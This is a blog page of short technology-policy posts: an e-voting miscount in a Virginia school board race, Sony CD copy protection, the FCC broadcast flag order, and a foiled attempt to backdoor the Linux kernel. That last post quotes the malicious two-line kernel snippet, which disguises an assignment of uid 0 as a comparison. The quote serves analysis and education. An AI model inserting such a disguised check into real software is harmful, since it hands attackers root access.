November 27, 2024

Flaky Voting Technology

Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine or will corrupt the machines’ software, to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.

This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports :

School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.

In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.

“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”

And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.

You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.

Linux Backdoor Attempt Thwarted

Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.

The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.

This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a badguy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source devleopers did read the code and spot the problem.

What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.

[Technogeek readers: The offending code is below. Can you spot the problem?

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]

New Sony CD-DRM Technology Upcoming

Reuters reports that a new CD copy-protection technology from Sony debuted yesterday in Germany, on a recording by the group Naturally Seven. Does anybody know how I can get a copy of this CD?

UPDATE (12:30 PM): Thanks to Joe Barillari and Scott Ananian for pointing me to amazon.de, where I ordered the CD. (At least I think I did; my German is pretty poor.)

Broadcast Flag Scorecard

Before the FCC issued its Broadcast Flag Order, I wrote a post on “Reading the Broadcast Flag Rules”, in which I recommended reading the eventual Order carefully since “the details can make a big difference.” I pointed to four specific choices the FCC had to make.

Let’s look at how the FCC chose. For each of the four issues I identified, I’ll quote in italics my previous posting, and then I’ll summarize the FCC’s action.

First, look at the criteria that an anti-copying technology must meet to be on the list of approved technologies. Must a technology give copyright owners control over all uses of content; or is a technology allowed [to] support legal uses such as time-shifting; or is it required to support such uses?

The Order says that technologies must prevent “indiscriminate redistribution”, but it isn’t precise about what that term means. The precise scope of permissible redistribution is deferred to a later rulemaking. There is also some language expressing a desire not to control copying within the home, but that desire may not be backed by formal requirement.

Verdict: This issue is still unresolved; perhaps the later rulemaking will clarify it.

Second, look at who decides which technologies can be on the approved list. Whoever makes this decision will control entry into the market for digital TV decoders. Is this up to the movie and TV industries; or does an administrative body like the FCC decide; or is each vendor responsible for determining whether their own technology meets the requirements?

This issue was deferred to a later rulemaking process, so we don’t know what the final answer will be. The FCC does appear to understand the danger inherent in letting the entertainment industry control the list.

The Order does establish an interim approval mechanism, in which the FCC makes the final decisions, after a streamlined filing and counter-filing process by the affected parties.

Verdict: This issue was deferred until later, but the FCC seems to be leaning in the right direction.

Third, see whether the regulatory process allows for the possibility that no suitable anti-copying technology exists. Will the mandate be delayed if no strong anti-copying technology exists; or do the rules require that some technology be certified by a certain date, even if none is up to par?

The Order doesn’t address this issue head-on. It does say that to qualify, a technology need only resist attacks by ordinary users using widely available tools. This decision, along with the lack of precision about the scope of home copying that will be allowed, makes it easier to find a compliant technology later.

Verdict: This issue was not specifically addressed; it may be clarified in the later rulemaking.

Finally, look at which types of devices are subject to design mandates. To be covered, must a device be primarily designed for decoding digital TV; or is it enough for it to be merely capable of doing so? Do the mandates apply broadly to “downstream devices”? And is something a “downstream device” based on what it is primarily designed to do, or on what it is merely capable of doing?

This last issue is the most important, since it defines how broadly the rule will interfere with technological progress. The worst-case scenario is an overbroad rule that ends up micro-managing the design of general-purpose technologies like personal computers and the Internet. I know the FCC means well, but I wish I could say I was 100% sure that they won’t make that mistake.

The Order regulates Digital TV demodulators, as well as Transport Stream Processors (which take the demodulated signal and separate it into its digital audio, video, and metadata components).

The impact on general-purpose computers is a bit hard to determine. It appears that if a computer contains a DTV receiver card, the communications between that card and the rest of the computer would be regulated. This would then impact the design of any applications or device drivers that handle the DTV stream coming from the card.

Verdict: The FCC seems to have been trying to limit the negative impact of the Order by limiting its scope, but some broad impacts seem to be inevitable side-effects of mandating any kind of Flag.

Bottom line: The FCC’s order will be harmful; but it could have been much, much worse.

The Broadcast Flag, and Threat Model Confusion

The FCC has mandated “broadcast flag” technology, which will limit technical options for the designers of digital TV tuners and related products. This is intended to reduce online redistribution of digital TV content, but it is likely to have little or no actual effect on the availability of infringing content on the Net.

The FCC is committing the classic mistake of not having a clear threat model. As I explained in more detail in a previous post, a “threat model” is a clearly defined explanation of what a security system is trying to prevent, and of the capabilities and motives of the people who are trying to defeat it. For a system like the broadcast flag, there are two threat models to choose from. Either you are trying to keep the average consumer from giving content to his friends and neighbors (the “casual copying” threat model), or you are trying to keep the content off of Internet distributions systems like KaZaa (the “Napsterization” threat model). You choose a threat model, and then you design a technology that prevents the threat you have chosen.

If you choose the casual copying model, your DRM technology needs to be strong enough to resist attack by average consumers only; but your technology will not address the Napsterization threat. If you choose the Napsterization threat model, then you have to be able to stop every would-be infringer from ripping the content, because if even one person manages to rip the content and upload it onto the Net, the content becomes available to everybody who wants it.

The FCC seems to be trying to have it both ways. They have mandated technologies that are only strong enough to prevent casual copying by typical consumers. But at the same time, they somehow expect those technologies to prevent Napsterization. This incoherence is evident throughout the FCC’s broadcast flag order. At several points the two incompatible threat models appear in the same paragraph; here is an example:

19. We recognize the concerns of commenters regarding potential vulnerabilities in a flag-based protection system. We are equally mindful of the fact that it is difficult if not impossible to construct a content protection scheme that is impervious to attack or circumvention. We believe, however, that the benefits achieved by creation of a flag-based system – creating a “speed bump” mechanism to prevent indiscriminate redistribution of broadcast content and ensure the continued availability of high value content to broadcast outlets – outweighs the potential vulnerabilities cited by commenters….

(emphasis added) The error here should be clear – a “speed bump” cannot prevent “indiscriminate redistribution”.

(I’ll have more to say about the broadcast flag in subsequent posts.)